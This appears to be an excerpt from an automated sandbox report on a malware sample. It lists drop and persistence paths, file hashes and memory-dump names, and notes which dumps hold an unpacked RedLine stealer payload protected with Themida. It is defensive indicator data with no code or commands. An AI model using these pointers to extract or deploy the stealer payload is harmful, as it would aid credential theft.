SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe (also recorded as \Users\Admin\AppData\Local\Temp\TextOutputHost.exe and as \ProgramData\MicrosoftNetwork\System.exe; all entries carry the same hashes, so the persisted System.exe is a byte-identical copy of the dropped TextOutputHost.exe)
Filesize 3.4MB
MD5 55a6d22be09d762103ae315f97b58561
SHA1 f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA256 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA512 4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
dump | filesize (mapping.dmp entries have no size)
memory/472-90-0x0000000000000000-mapping.dmp |
memory/976-87-0x0000000000000000-mapping.dmp |
memory/1020-75-0x0000000000000000-mapping.dmp |
memory/1020-81-0x0000000002A44000-0x0000000002A47000-memory.dmp | 12KB
memory/1020-78-0x000007FEF2C50000-0x000007FEF37AD000-memory.dmp | 11.4MB
memory/1020-93-0x0000000002A4B000-0x0000000002A6A000-memory.dmp | 124KB
memory/1020-92-0x0000000002A44000-0x0000000002A47000-memory.dmp | 12KB
memory/1020-77-0x000007FEF37B0000-0x000007FEF41D3000-memory.dmp | 10.1MB
memory/1020-84-0x000000001B760000-0x000000001BA5F000-memory.dmp | 3.0MB
memory/1700-102-0x0000000001DF0000-0x0000000001E70000-memory.dmp | 512KB
memory/1700-104-0x0000000001DF0000-0x0000000001E70000-memory.dmp | 512KB
memory/1700-103-0x0000000001DF0000-0x0000000001E70000-memory.dmp | 512KB
memory/1700-98-0x0000000000000000-mapping.dmp |
memory/1700-101-0x000007FEF1EF0000-0x000007FEF2A4D000-memory.dmp | 11.4MB
memory/1700-105-0x0000000001DF0000-0x0000000001E70000-memory.dmp | 512KB
memory/1700-100-0x000007FEF3500000-0x000007FEF3F23000-memory.dmp | 10.1MB
memory/1740-67-0x0000000076F90000-0x0000000077110000-memory.dmp | 1.5MB
memory/1740-54-0x00000000750B1000-0x00000000750B3000-memory.dmp | 8KB
memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmp | 10.8MB
memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmp | 10.8MB
memory/1740-59-0x0000000000830000-0x0000000001302000-memory.dmp | 10.8MB
memory/1740-60-0x0000000076F90000-0x0000000077110000-memory.dmp | 1.5MB
memory/1740-61-0x0000000000830000-0x0000000001302000-memory.dmp | 10.8MB
memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmp | 10.8MB
memory/1808-72-0x000000013FCD0000-0x0000000140628000-memory.dmp | 9.3MB
memory/1808-69-0x000000013FCD0000-0x0000000140628000-memory.dmp | 9.3MB
memory/1808-68-0x000000013FCD0000-0x0000000140628000-memory.dmp | 9.3MB
memory/1808-70-0x000000013FCD0000-0x0000000140628000-memory.dmp | 9.3MB
memory/1808-63-0x0000000000000000-mapping.dmp |
memory/1808-71-0x0000000076DB0000-0x0000000076F59000-memory.dmp | 1.7MB
memory/1808-83-0x0000000076DB0000-0x0000000076F59000-memory.dmp | 1.7MB
memory/1808-73-0x000007FEFB631000-0x000007FEFB633000-memory.dmp | 8KB
memory/1808-80-0x000000013FCD0000-0x0000000140628000-memory.dmp | 9.3MB
memory/1808-82-0x00000000003E0000-0x00000000003F0000-memory.dmp | 64KB
For triage, the 0x830000-0x1302000 region of pid 1740 (e4.exe) is the one that matched both the family_redline and the themida rules, so the 10.8MB dumps 1740-57, 1740-58 and 1740-66 contain the unpacked RedLine payload; the 0x13FCD0000-0x140628000 region of pid 1808 is the Themida-protected image of TextOutputHost.exe.